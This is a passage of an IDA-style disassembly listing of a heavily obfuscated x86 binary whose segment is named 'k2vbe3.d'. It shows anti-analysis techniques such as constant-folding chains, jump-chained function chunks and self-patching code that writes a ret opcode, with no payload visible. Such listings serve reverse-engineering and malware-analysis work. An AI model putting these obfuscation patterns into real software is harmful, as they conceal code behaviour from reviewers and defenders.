loc_443610:				; CODE XREF: sub_4481FA-66BBj
		push	407C291Fh
		pop	esi
		or	esi, 96D93765h
		and	esi, 0C0FB9F79h
		add	esi, 1AD2E67h
		jmp	loc_455866
; END OF FUNCTION CHUNK	FOR sub_4481FA
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43FF59

loc_44362D:				; CODE XREF: sub_43FF59:loc_43E175j
					; k2vbe3.d:0045427Fj
		jge	loc_451403
		jbe	loc_4504E2
		add	edi, 0C2A1AA05h
		jmp	loc_451403
; END OF FUNCTION CHUNK	FOR sub_43FF59
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44D0D5

loc_443644:				; CODE XREF: sub_44D0D5-B19j
		jnz	loc_4419E8
		jmp	loc_453A97
; END OF FUNCTION CHUNK	FOR sub_44D0D5

; =============== S U B	R O U T	I N E =======================================



sub_44364F	proc near		; CODE XREF: k2vbe3.d:0043F3CDp
					; k2vbe3.d:004546FAj

; FUNCTION CHUNK AT 0044A447 SIZE 00000005 BYTES

		xchg	eax, [esp+0]
		pop	eax
		mov	[ebx], eax
		pop	ebx
		lea	eax, sub_44ED3C
		mov	byte ptr [eax],	0C3h
		jmp	loc_44A447
sub_44364F	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45AA63

loc_443664:				; CODE XREF: sub_45AA63+4j
		pop	edx
		mov	eax, [esp-4+arg_0]
		jmp	loc_4573EA
; END OF FUNCTION CHUNK	FOR sub_45AA63
; ---------------------------------------------------------------------------

loc_44366D:				; CODE XREF: k2vbe3.d:loc_441BBFj
		sub	al, 99h
		mov	edx, [ebp-4]
		call	sub_43EE03
; START	OF FUNCTION CHUNK FOR sub_44F028

loc_443677:				; CODE XREF: sub_44F028+B760j
		jmp	loc_4440F5
; END OF FUNCTION CHUNK	FOR sub_44F028
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44B999

loc_44367C:				; CODE XREF: sub_44B999-C9B5j
		pop	ebp
		retn
; END OF FUNCTION CHUNK	FOR sub_44B999

; =============== S U B	R O U T	I N E =======================================



sub_44367E	proc near		; CODE XREF: k2vbe3.d:loc_43CC50p
					; sub_440EE3-3ADCp ...

; FUNCTION CHUNK AT 00445408 SIZE 00000016 BYTES
; FUNCTION CHUNK AT 00447AF5 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044C242 SIZE 00000013 BYTES

		push	ebp
		call	sub_45B710

loc_443684:				; CODE XREF: k2vbe3.d:00456E11j
		jmp	loc_445408
sub_44367E	endp

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45811A

loc_443689:				; CODE XREF: sub_45811A-A0A7j
		jmp	nullsub_6
; END OF FUNCTION CHUNK	FOR sub_45811A
; ---------------------------------------------------------------------------

loc_44368E:				; CODE XREF: k2vbe3.d:004544B7j
		pushf
		push	0EADF20D4h
		pop	esi
		and	esi, 1DE76E9Ah
		sub	esi, 7A3DE7A2h
		add	esi, 0E1FA71C7h
		sub	esi, 8C71C4D7h
		jmp	loc_4575AE
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4597AE

loc_4436B2:				; CODE XREF: sub_4597AE:loc_447418j
					; k2vbe3.d:00454385j
		or	eax, 7DF8B369h
		add	eax, 24BA938h
		xchg	eax, [esp+4+var_4]
		jmp	loc_453CFD
; END OF FUNCTION CHUNK	FOR sub_4597AE
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43FE0A

loc_4436C6:				; CODE XREF: sub_43FE0A+1FF4j
		inc	dword ptr [ebp-0Ch]
		jmp	loc_443443
; END OF FUNCTION CHUNK	FOR sub_43FE0A

; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_4436CE	proc near		; CODE XREF: sub_456C15:loc_43C2E5j
					; k2vbe3.d:loc_43CC04p	...

var_14		= byte ptr -14h

; FUNCTION CHUNK AT 0045A9EF SIZE 0000001C BYTES
; FUNCTION CHUNK AT 0045B663 SIZE 00000016 BYTES

		push	ebp
		mov	ebp, esp
		jb	sub_446523
		add	esp, 0FFFFFFECh
		jmp	loc_45A9EF
sub_4436CE	endp

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_450983

loc_4436DF:				; CODE XREF: sub_450983+A4F8j
		jz	loc_43DAAB
		jmp	loc_4550A0
; END OF FUNCTION CHUNK	FOR sub_450983
; ---------------------------------------------------------------------------
		xchg	eax, [ebx]
		jmp	loc_458744
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_151. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------

loc_4436F2:				; CODE XREF: k2vbe3.d:loc_44CD68j
					; k2vbe3.d:00453CDEj
		jmp	loc_452AF9
; ---------------------------------------------------------------------------

loc_4436F7:				; CODE XREF: k2vbe3.d:004413EFj
		jmp	loc_44D548
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45512F

loc_4436FC:				; CODE XREF: sub_45512F-15B88j
		jp	loc_450EEC

loc_443702:				; CODE XREF: sub_45512F:loc_4485A0j
		add	ebx, 0D25B7467h
		and	ebx, 1CFD69D4h
		add	ebx, 0E7E8B751h
		xchg	ebx, [esp+0]
		jmp	sub_4553CC
; END OF FUNCTION CHUNK	FOR sub_45512F
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44B912

loc_44371C:				; CODE XREF: sub_44B912:loc_451073j
		add	ebx, 245431FAh
		popf
		xchg	ebx, [esp-8+arg_4]
		jmp	loc_44CB47
; END OF FUNCTION CHUNK	FOR sub_44B912
; ---------------------------------------------------------------------------
		and	esi, 0D92D2908h
		pushf
		sbb	edx, 98818539h
		jmp	loc_44F10B
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_228. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_440E71

loc_44373E:				; CODE XREF: sub_440E71+12j
		jmp	loc_43D879
; END OF FUNCTION CHUNK	FOR sub_440E71
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44B495

loc_443743:				; CODE XREF: sub_44B495+Bj
		jnz	loc_44A2FC
		jmp	loc_45878A
; END OF FUNCTION CHUNK	FOR sub_44B495
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_451E00

loc_44374E:				; CODE XREF: sub_451E00:loc_451E11j
		mov	eax, [eax-8]
		or	eax, 8
		or	eax, 10h
		mov	edx, [ebp+8]
		mov	[edx-8], eax
		jmp	loc_45131D
; END OF FUNCTION CHUNK	FOR sub_451E00
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44D316

loc_443762:				; CODE XREF: sub_44D316-6ADFj
		cmp	dword ptr [ebp-10h], 2
		jnz	loc_45131D
		jmp	loc_43CD83
; END OF FUNCTION CHUNK	FOR sub_44D316
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4481DC

loc_443771:				; CODE XREF: sub_4481DC:loc_4481E3j
		mov	eax, [ebp-4]
		cmp	byte ptr [eax],	0
		jnz	loc_449516
		mov	eax, [ebp-8]
		mov	byte ptr [eax],	0
		mov	esp, ebp
		jmp	loc_44950F
; END OF FUNCTION CHUNK	FOR sub_4481DC
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44DCF5

loc_44378A:				; CODE XREF: sub_44DCF5+A3CCj
		jb	loc_44C594
		jmp	loc_440DDC
; END OF FUNCTION CHUNK	FOR sub_44DCF5

; =============== S U B	R O U T	I N E =======================================



sub_443795	proc near		; CODE XREF: sub_446E24-6B07p
					; k2vbe3.d:0044E6A1j

; FUNCTION CHUNK AT 004412D3 SIZE 0000001A BYTES
; FUNCTION CHUNK AT 004412FF SIZE 00000011 BYTES
; FUNCTION CHUNK AT 0045B215 SIZE 00000005 BYTES

		xchg	esi, [esp+0]
		pop	esi
		xor	esi, 0F32D470Ch

loc_44379F:				; CODE XREF: sub_44B495:loc_458794j
		add	esi, ebp
		add	esi, 350DD00Fh
		mov	[esi], eax
		pop	esi
		popf
		jmp	loc_45B215
sub_443795	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_450F71

loc_4437B0:				; CODE XREF: sub_450F71-10093j
		xchg	esi, ebp
		cmp	ebx, 0DC02CF96h
		jmp	loc_43E73D
; END OF FUNCTION CHUNK	FOR sub_450F71
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_454E69

loc_4437BD:				; CODE XREF: sub_454E69:loc_441340j
		push	edx
		call	sub_443A95
		mov	eax, 32FE4135h
		push	edi
		push	9A9807DDh
		jmp	loc_451790
; END OF FUNCTION CHUNK	FOR sub_454E69

; =============== S U B	R O U T	I N E =======================================



sub_4437D3	proc near		; DATA XREF: sub_43C04E:loc_44B542o

var_C		= dword	ptr -0Ch
var_4		= dword	ptr -4

; FUNCTION CHUNK AT 0043E03C SIZE 0000000A BYTES
; FUNCTION CHUNK AT 0044182C SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044329B SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044AE81 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044D333 SIZE 0000000A BYTES
; FUNCTION CHUNK AT 0044D971 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00453ADD SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00456192 SIZE 0000001B BYTES
; FUNCTION CHUNK AT 00459B3C SIZE 0000001F BYTES

		or	eax, eax
		jnz	loc_44775C
		jmp	loc_453ADD
sub_4437D3	endp

; [00000001 BYTES: COLLAPSED FUNCTION nullsub_520. PRESS KEYPAD	"+" TO EXPAND]
		db 0F7h, 92h, 0FFh
		db 0FFh
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4529E2

loc_4437E5:				; CODE XREF: sub_4529E2-A452j
		jz	loc_43CB9B
		jmp	loc_454B5B
; END OF FUNCTION CHUNK	FOR sub_4529E2
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_442F31

loc_4437F0:				; CODE XREF: sub_442F31+3ED4j
		push	eax
		push	offset loc_442CC9
		jmp	nullsub_72
; END OF FUNCTION CHUNK	FOR sub_442F31

; =============== S U B	R O U T	I N E =======================================



sub_4437FB	proc near		; CODE XREF: k2vbe3.d:00447B25j
					; sub_45634D-93ABp

; FUNCTION CHUNK AT 00459ACD SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0045A02E SIZE 00000015 BYTES

		xchg	ebx, [esp+0]
		pop	ebx
		push	ebx
		push	0CC632272h
		adc	ebx, eax
		jmp	loc_459ACD
sub_4437FB	endp

; ---------------------------------------------------------------------------

loc_44380C:				; CODE XREF: k2vbe3.d:00451123j
		mov	eax, [esp]
		push	edx
		push	eax
		push	2FA74808h
; START	OF FUNCTION CHUNK FOR sub_444D7B

loc_443816:				; CODE XREF: sub_444D7B-D64j
		pop	eax
		jmp	loc_442AE5
; END OF FUNCTION CHUNK	FOR sub_444D7B
; ---------------------------------------------------------------------------

loc_44381C:				; CODE XREF: k2vbe3.d:loc_452127j
		jz	loc_43EAC6
		jmp	loc_4599B8
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45A323

loc_443827:				; CODE XREF: sub_45A323:loc_44AE86j
		and	ecx, edx
		jno	loc_442740
		push	ecx
		or	ecx, 0B32D7D11h
		jmp	loc_459698
; END OF FUNCTION CHUNK	FOR sub_45A323
; ---------------------------------------------------------------------------
		mov	eax, 1171F650h
		call	sub_4553CC
		mov	ds:off_41E0B8, eax
		lea	eax, sub_44E00F
		call	sub_44C03F
; START	OF FUNCTION CHUNK FOR sub_44655E

loc_443856:				; CODE XREF: sub_44655E+C72Bj
		jmp	sub_4553CC
; END OF FUNCTION CHUNK	FOR sub_44655E
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4593D6

loc_44385B:				; CODE XREF: sub_4593D6-D7ADj
		jmp	sub_4436CE
; END OF FUNCTION CHUNK	FOR sub_4593D6
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_449372

loc_443860:				; CODE XREF: k2vbe3.d:loc_440676j
					; sub_449372-137Dj
		jmp	loc_4500B0
; END OF FUNCTION CHUNK	FOR sub_449372

; =============== S U B	R O U T	I N E =======================================



sub_443865	proc near		; DATA XREF: sub_44A0D7-9FA0o
		xchg	ebx, [esp+0]
		jmp	sub_4570C0
sub_443865	endp

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43FDC1

loc_44386D:				; CODE XREF: sub_43FDC1+191BFj
		rol	edi, 1Ah

loc_443870:				; CODE XREF: sub_43FDC1:loc_4432E8j
		push	offset loc_44006D
		jmp	loc_451775
; END OF FUNCTION CHUNK	FOR sub_43FDC1
; ---------------------------------------------------------------------------
		mov	esi, [ecx]
		jmp	loc_451C23
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4529E2

loc_443881:				; CODE XREF: sub_4529E2:loc_44F4DAj
		jge	loc_4599C5
		test	edx, 46F45E87h
		jmp	loc_4599BD
; END OF FUNCTION CHUNK	FOR sub_4529E2
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_372. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_444B3E

loc_443893:				; CODE XREF: sub_444B3E+16A78j
		jmp	nullsub_4
; END OF FUNCTION CHUNK	FOR sub_444B3E
; ---------------------------------------------------------------------------

loc_443898:				; CODE XREF: k2vbe3.d:0043DB08j
		jmp	sub_455F6B
; ---------------------------------------------------------------------------

locret_44389D:				; CODE XREF: k2vbe3.d:0044FA55j
		retn
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4508A3

loc_44389E:				; CODE XREF: sub_4508A3+7j
		jmp	loc_44A06A
; END OF FUNCTION CHUNK	FOR sub_4508A3
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4529E2

loc_4438A3:				; CODE XREF: sub_4529E2-13922j
		jmp	loc_4572E5
; END OF FUNCTION CHUNK	FOR sub_4529E2
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_450F71

loc_4438A8:				; CODE XREF: sub_450F71:loc_45928Bj
		sub	ecx, 762BC8B1h
		and	ecx, 41B5F982h
		add	ecx, 5D7D9CCDh
		add	eax, ecx
		pop	ecx
		mov	eax, [eax]
		add	eax, [ebp-4]
		jmp	loc_4570E2
; END OF FUNCTION CHUNK	FOR sub_450F71
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44E059

loc_4438C7:				; CODE XREF: sub_44E059:loc_450A25j
		and	esi, 8B14A5C2h
		mov	edi, ecx
		and	edi, ecx
		jmp	loc_455719
; END OF FUNCTION CHUNK	FOR sub_44E059
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_447E07

loc_4438D6:				; CODE XREF: sub_447E07:loc_459FA1j
		add	eax, ebp
		add	eax, 7DEE1678h
		mov	eax, [eax]
		cmp	byte ptr [eax],	0F1h
		jnz	loc_4486F2
		jmp	loc_44269C
; END OF FUNCTION CHUNK	FOR sub_447E07
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45A323

loc_4438EE:				; CODE XREF: sub_45A323-F4CBj
		xchg	esi, [esp+10h+var_10]
		jmp	sub_43C04E
; END OF FUNCTION CHUNK	FOR sub_45A323

; =============== S U B	R O U T	I N E =======================================



sub_4438F6	proc near		; CODE XREF: k2vbe3.d:0043DDFCj
					; k2vbe3.d:00440B7Fp

arg_0		= dword	ptr  4

; FUNCTION CHUNK AT 00452F32 SIZE 00000005 BYTES

		xchg	eax, [esp+0]
		pop	eax
		xchg	esi, [esp-4+arg_0]
		jmp	loc_452F32
sub_4438F6	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_456541

loc_443902:				; CODE XREF: sub_456541-173FAj
					; k2vbe3.d:004598FCj ...
		jz	loc_44D93A
		cmp	dword ptr [ebp-14h], 4
		call	sub_44A1B1

loc_443911:				; CODE XREF: sub_4570C0-14E2Aj
		jmp	nullsub_211
; END OF FUNCTION CHUNK	FOR sub_456541

; =============== S U B	R O U T	I N E =======================================



sub_443916	proc near		; CODE XREF: sub_441484+8j

var_4		= dword	ptr -4

; FUNCTION CHUNK AT 0044DE47 SIZE 00000008 BYTES
; FUNCTION CHUNK AT 0045958F SIZE 00000005 BYTES

		push	ebx
		push	0AF25078Fh
		pop	ebx
		or	ebx, 0D39C12BAh
		add	ebx, 0B64E3D04h
		sub	ebx, 67F7071Fh
		and	ebx, 0F93BE566h
		add	ebx, 0B83485EAh
		jmp	loc_45958F
sub_443916	endp


; =============== S U B	R O U T	I N E =======================================



sub_443940	proc near		; CODE XREF: k2vbe3.d:00444B84j
					; sub_443A30+CC52p

var_C		= dword	ptr -0Ch
var_8		= dword	ptr -8
var_4		= dword	ptr -4
arg_0		= dword	ptr  4

; FUNCTION CHUNK AT 00451C68 SIZE 00000005 BYTES

		xchg	eax, [esp+0]
		pop	eax
		pop	edi
		jmp	loc_451C68
sub_443940	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43CD01

loc_44394A:				; CODE XREF: sub_43CD01:loc_443CB7j
		add	ebx, eax
		or	ebx, 690C691Eh
		xor	ebx, edx
		add	edx, ebx
		call	sub_452C99

loc_44395B:				; CODE XREF: sub_4469E1+132D2j
		mov	ds:dword_458BE0, eax
		retn
; END OF FUNCTION CHUNK	FOR sub_43CD01
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4469E1

loc_443962:				; CODE XREF: sub_4469E1-A923j
		rol	eax, 0Ah
		push	eax
		jmp	nullsub_506
; END OF FUNCTION CHUNK	FOR sub_4469E1
; ---------------------------------------------------------------------------

loc_44396B:				; CODE XREF: k2vbe3.d:loc_43D9D0j
		jge	loc_44ACD2

loc_443971:				; CODE XREF: k2vbe3.d:0044D44Aj
		jmp	loc_44CE9A
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43FAE2

loc_443976:				; CODE XREF: sub_43FAE2+1Dj
		jmp	loc_452C8E
; END OF FUNCTION CHUNK	FOR sub_43FAE2
; ---------------------------------------------------------------------------
		mov	ebx, 6DAF4CC9h
		jmp	loc_448461
; ---------------------------------------------------------------------------
		mov	ebx, [ecx]
		jbe	loc_44234B
		jmp	sub_43EFDA
; ---------------------------------------------------------------------------

loc_443992:				; CODE XREF: k2vbe3.d:0045BF98j
		mov	[esi], ecx
		add	ecx, esi
		or	ecx, 9F2CD20Ah

loc_44399C:				; CODE XREF: k2vbe3.d:loc_45BF8Cj
		rol	edx, 1Ah
		or	edx, 0CB6782B2h
		add	edx, 4447999h
		mov	edx, [edx]
		jmp	loc_444E78
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44DB59

loc_4439B2:				; CODE XREF: sub_44DB59-7750j
		sbb	ebx, ecx
		jmp	loc_44B81A
; END OF FUNCTION CHUNK	FOR sub_44DB59

; =============== S U B	R O U T	I N E =======================================



sub_4439B9	proc near		; CODE XREF: sub_446D41+11j

var_4		= dword	ptr -4

; FUNCTION CHUNK AT 00447104 SIZE 00000005 BYTES

		push	ebp
		mov	ebp, ecx
		xchg	ebp, [esp+4+var_4]

loc_4439BF:				; CODE XREF: k2vbe3.d:loc_43EAC0j
		push	0FD6A521Eh

loc_4439C4:				; CODE XREF: k2vbe3.d:loc_4532EBj
		pop	ecx
		xor	ecx, 35519216h
		add	ecx, 380868CFh
		xchg	ecx, [esp+4+var_4]
		jmp	loc_447104
sub_4439B9	endp

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44F655

loc_4439D9:				; CODE XREF: sub_44F655:loc_458F17j
		pop	ebx
		rol	eax, 4
		add	eax, 84B29CAAh
		xchg	eax, [esp+4+var_4]
		jmp	loc_44BDA0
; END OF FUNCTION CHUNK	FOR sub_44F655
; ---------------------------------------------------------------------------

loc_4439EB:				; CODE XREF: k2vbe3.d:00452044j
		ja	loc_44249D
		adc	ecx, edx

loc_4439F3:				; CODE XREF: k2vbe3.d:0044EA4Bj
		or	eax, 5261F307h
		add	eax, 0C8190085h
		add	eax, ebp
		add	eax, 0BD68FFD0h
		mov	eax, [eax]
		call	nullsub_16
		jmp	locret_457E8B
; ---------------------------------------------------------------------------
		mov	[ebp-4], eax
		jmp	loc_45369B
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44D59D

loc_443A1B:				; CODE XREF: sub_44D59D:loc_446C00j
		cmp	byte ptr [ebp-5], 0
		jnz	loc_440F45
		jmp	loc_4548D0
; END OF FUNCTION CHUNK	FOR sub_44D59D
; ---------------------------------------------------------------------------

loc_443A2A:				; CODE XREF: k2vbe3.d:0043CEE6j
		jo	loc_4586F6

; =============== S U B	R O U T	I N E =======================================



sub_443A30	proc near		; CODE XREF: sub_43FF90:loc_454760p

arg_8		= dword	ptr  0Ch
arg_C		= dword	ptr  10h
arg_10		= dword	ptr  14h

; FUNCTION CHUNK AT 0043E987 SIZE 00000016 BYTES
; FUNCTION CHUNK AT 0043FFC1 SIZE 00000011 BYTES
; FUNCTION CHUNK AT 00449171 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044A4AE SIZE 00000011 BYTES
; FUNCTION CHUNK AT 0044A54E SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0044A659 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044A729 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044B1D8 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044C7F8 SIZE 0000000D BYTES
; FUNCTION CHUNK AT 0044F8DC SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004501BF SIZE 0000000D BYTES
; FUNCTION CHUNK AT 0045067C SIZE 00000014 BYTES
; FUNCTION CHUNK AT 00452791 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00452E54 SIZE 00000012 BYTES
; FUNCTION CHUNK AT 00453602 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00455CD3 SIZE 0000001A BYTES
; FUNCTION CHUNK AT 004573F9 SIZE 0000000F BYTES
; FUNCTION CHUNK AT 00459D64 SIZE 00000011 BYTES
; FUNCTION CHUNK AT 0045A0B5 SIZE 00000015 BYTES
; FUNCTION CHUNK AT 0045BFA9 SIZE 00000005 BYTES

		xchg	eax, [esp+0]

loc_443A33:				; CODE XREF: sub_43C865:loc_45C308j
		pop	eax
		add	edx, ebp
		jmp	loc_44B1D8
sub_443A30	endp ; sp-analysis failed


; =============== S U B	R O U T	I N E =======================================



sub_443A3B	proc near		; DATA XREF: sub_45A323:loc_43FDDFo
		call	sub_45B74D
		jmp	loc_43FE70
sub_443A3B	endp

; ---------------------------------------------------------------------------

loc_443A45:				; CODE XREF: k2vbe3.d:00448B37j
		mov	edx, ds:dword_447394
		or	edx, edx
		jnz	loc_457DAC
		jmp	loc_446136
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44CE6C

loc_443A58:				; CODE XREF: sub_44CE6C:loc_44EE6Dj
		jl	loc_43F851
		shr	ebx, 7
		jo	loc_456216
		sub	eax, 0B23F2638h
		jo	loc_444A7D
		jmp	loc_43F84B
; END OF FUNCTION CHUNK	FOR sub_44CE6C
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45101A

loc_443A78:				; CODE XREF: sub_45101A+7F7Aj
		jns	loc_43FDE4
; END OF FUNCTION CHUNK	FOR sub_45101A
; START	OF FUNCTION CHUNK FOR sub_44E481

loc_443A7E:				; CODE XREF: sub_45156D:loc_443ECCj
					; sub_45101A:loc_447235j ...
		jmp	loc_44036F
; END OF FUNCTION CHUNK	FOR sub_44E481
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45101A

loc_443A83:				; CODE XREF: sub_45101A-8D82j
					; sub_45156D+8120j
		pop	ecx
		xchg	eax, [esp+0]
		mov	ebp, eax
		pop	eax
		retn
; END OF FUNCTION CHUNK	FOR sub_45101A
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43FCA0

loc_443A8B:				; CODE XREF: sub_43FCA0+1A2AFj
		jmp	loc_448572
; END OF FUNCTION CHUNK	FOR sub_43FCA0
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43E360

loc_443A90:				; CODE XREF: sub_43E360+17j
		jmp	loc_45BDF2
; END OF FUNCTION CHUNK	FOR sub_43E360

; =============== S U B	R O U T	I N E =======================================



sub_443A95	proc near		; CODE XREF: k2vbe3.d:0043F425p
					; sub_441409:loc_440A5Cj ...
		push	ecx
		jmp	sub_450B1E
sub_443A95	endp

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45762D

loc_443A9B:				; CODE XREF: sub_45762D+Dj
		sub	edi, ds:4000F2h
		or	edi, ds:4000EDh
		sub	edi, 1E9F7EEFh
		xor	edi, 8B55AFD2h
		jmp	loc_43E86C
; END OF FUNCTION CHUNK	FOR sub_45762D
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44921C

loc_443AB8:				; CODE XREF: sub_44921C:loc_4567F0j
		jz	loc_442915
		jmp	loc_43D9BA
; END OF FUNCTION CHUNK	FOR sub_44921C
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43F7AC

loc_443AC3:				; CODE XREF: sub_43F7AC+146C6j
		jmp	loc_43DDF6
; END OF FUNCTION CHUNK	FOR sub_43F7AC
; ---------------------------------------------------------------------------
		jmp	loc_452850
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43F7AC

loc_443ACD:				; CODE XREF: sub_43F7AC:loc_445F3Ej
		push	eax
		push	9165E1F8h
		pop	eax
		sub	eax, 0E88EE8A4h
; END OF FUNCTION CHUNK	FOR sub_43F7AC
; START	OF FUNCTION CHUNK FOR sub_44B999

loc_443ADA:				; CODE XREF: sub_44B999:loc_44C9F3j
		and	eax, 0B4741A46h
		cmp	eax, 0BFEB352Bh
		jmp	loc_4515F6
; END OF FUNCTION CHUNK	FOR sub_44B999
; ---------------------------------------------------------------------------
		add	ebx, edi
		jmp	sub_447B71
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_309. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_452C99

loc_443AF3:				; CODE XREF: sub_452C99+620Ej
		jmp	nullsub_298
; END OF FUNCTION CHUNK	FOR sub_452C99
; ---------------------------------------------------------------------------
		shr	edi, 7
		jmp	sub_444297
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_440CEA

loc_443B00:				; CODE XREF: sub_440CEA:loc_455E6Ej
		jnz	loc_457AFC
		jmp	loc_4588D7
; END OF FUNCTION CHUNK	FOR sub_440CEA
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43FA2C

loc_443B0B:				; CODE XREF: sub_43FA2C+Bj
		pop	ebp
		push	83E7D64Dh
		pop	eax
		and	eax, 18835E46h
		add	eax, 0FFC1E6ACh
		mov	eax, [eax]
		or	eax, eax
		jnz	loc_441AD9
		jmp	loc_45876C
; END OF FUNCTION CHUNK	FOR sub_43FA2C
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_447BE9

loc_443B2D:				; CODE XREF: sub_447BE9+5F69j
		add	edx, 163327F2h
		mov	[edx], eax
		pop	edx
		mov	eax, [ebp+var_4]
		mov	al, [eax]
		jo	loc_458C95
		sub	al, 99h
		mov	edx, [ebp+var_4]
		jmp	loc_441588
; END OF FUNCTION CHUNK	FOR sub_447BE9
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_446E24

loc_443B4B:				; CODE XREF: sub_446E24:loc_448A57j
					; sub_446E24+1FD5j ...
		push	offset sub_44B870
		jmp	loc_442893
; END OF FUNCTION CHUNK	FOR sub_446E24

; =============== S U B	R O U T	I N E =======================================



sub_443B55	proc near		; CODE XREF: sub_43FAE2:loc_452C93p
					; k2vbe3.d:00458D3Bj
		xchg	esi, [esp+0]
		pop	esi
		mov	eax, [ebp-0Ch]
		mov	esp, ebp
		pop	ebp
		jmp	nullsub_31
sub_443B55	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43D0A9

loc_443B64:				; CODE XREF: sub_43D0A9+18500j
		or	edi, eax
		cmp	esi, 39312CAFh
		jmp	loc_458448
; END OF FUNCTION CHUNK	FOR sub_43D0A9
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_438. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44EC4A

loc_443B72:				; CODE XREF: sub_44EC4A+13j
		jmp	loc_4431C8
; END OF FUNCTION CHUNK	FOR sub_44EC4A
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_451F91

loc_443B77:				; CODE XREF: sub_451F91:loc_44A9BBj
		jmp	sub_443E9D
; END OF FUNCTION CHUNK	FOR sub_451F91
; ---------------------------------------------------------------------------
		popf
		jmp	sub_4586FE
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44B94B

loc_443B82:				; CODE XREF: sub_44B94B-41B2j
		or	esi, 5E59C14Ah
		jmp	loc_44B911
